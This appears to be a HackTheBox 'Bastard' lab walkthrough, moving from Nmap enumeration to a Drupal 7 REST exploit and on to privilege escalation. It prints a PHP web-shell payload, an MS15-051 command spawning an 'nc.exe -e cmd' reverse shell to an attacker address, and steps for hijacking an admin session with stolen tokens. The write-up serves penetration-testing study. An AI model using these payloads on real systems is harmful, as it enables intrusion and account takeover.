Skip to main content

HTB - Bastard

alt

Basic Nmap scan

Nmap command: nmap -Pn -n -sC -sV -oA scan_boxs/bastard/nmap/10.10.10.9-d-scan 10.10.10.9
Nmap scan report for 10.10.10.9
Host is up (0.16s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-generator: Drupal 7 (http://drupal.org)
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
135/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Open ports : 80,135,49154

PORTSERVICEPRODUCTVERSIONEXTRAINFO
80httpMicrosoft IIS httpd7.5
135msrpcMicrosoft Windows RPC
49154msrpcMicrosoft Windows RPC

Looks like we have Drupal 7 hosted on the machine. Lets check if we can pull the exact version information. Nmap has provided CHANGELOG.txt, Install.txt file are accessible.

alt

Drupal version is 7.54 running on the machine.

Exploit - drupal 7

searchsploit came up with an relevant exploit.
alt

fixing the 41564.php file with url, endpoint_path and data -> contains the php exploit

$url = 'http://10.10.10.9';
$endpoint_path = '/rest';
$endpoint = 'rest_endpoint';

$file = [
'filename' => 'cybo.php',
'data' => '<?php echo system($_REQUEST["cmd"]); ?>'
];

Failed to execute the code, the code uses php-curl library files.
alt

The exploit was successfully executed and generated session.json, user.json and written cybo.php file.

alt

We have code execution.
alt

systeminfo reveals that we are on Microsoft Windows Server 2008 R2 Datacenter
alt

Let move to burp so that we have better control over the requests we send
alt

Reverse shell

Generate powershell reverse shell and submit the request.
alt

Capture the reverse shell with ncat
alt

The current user is nt authority\iusr and we get the user flag.

User Flag

alt

Privilege Escalation

Time to download sherlock and execute.

alt

Sherlock found two vulnerabilities on the machine MS15-051 and MS16-032

Exploit MS15-051

Similar to htb-devel machine, htb-bastard is also exploitable and we apply the same approach. We download https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS15-051 and upload ms15-051x64.exe and nc.exe files. execute the following command in the powershell reverse shell we have.

ps> cmd /c 'ms15-051x64.exe "nc.exe -e cmd 10.10.14.15 9002"'

alt

Root Flag

alt

Session hijacking route

Looking into the json files has more wealth of information.

user.json

{
"uid": "1",
"name": "admin",
"mail": "[email protected]",
"theme": "",
"created": "1489920428",
"access": "1492102672",
"login": 1660857975,
"status": "1",
"timezone": "Europe\/Athens",
"language": "",
"picture": null,
"init": "[email protected]",
"data": false,
"roles": {
"2": "authenticated user",
"3": "administrator"
},
"rdf_mapping": {
"rdftype": [
"sioc:UserAccount"
],
"name": {
"predicates": [
"foaf:name"
]
},
"homepage": {
"predicates": [
"foaf:page"
],
"type": "rel"
}
},
"pass": "$S$DRYKUR0xDeqClnV5W0dnncafeE.Wi4YytNcBmmCtwOjrcH5FJSaE"
}

Cracking the above would take lot of time if we don't have cracking station. So for now we will move on to session.json file.

session.json

{
"session_name": "SESSd873f26fc11f2b7e6e4aa0f6fce59913",
"session_id": "tKi5-kHOTCi2YAFZhRvM8PkHb6nvhofBBHByzanOCDU",
"token": "_YZ5d9Kro9QJ0Tnei7tawhRfl-5AWg5j-YH9dpr7oqQ"
}

This is page without injecting cookie in the page.
alt

session hijacking

Lets create a cookie and inject send a request.

Initially there is only one cookie. Let's edit the cookie and save it as the session_name and session_id from session.json file
alt

alt

Saved cookie
alt

Accessing the page again will lands us as an admin
alt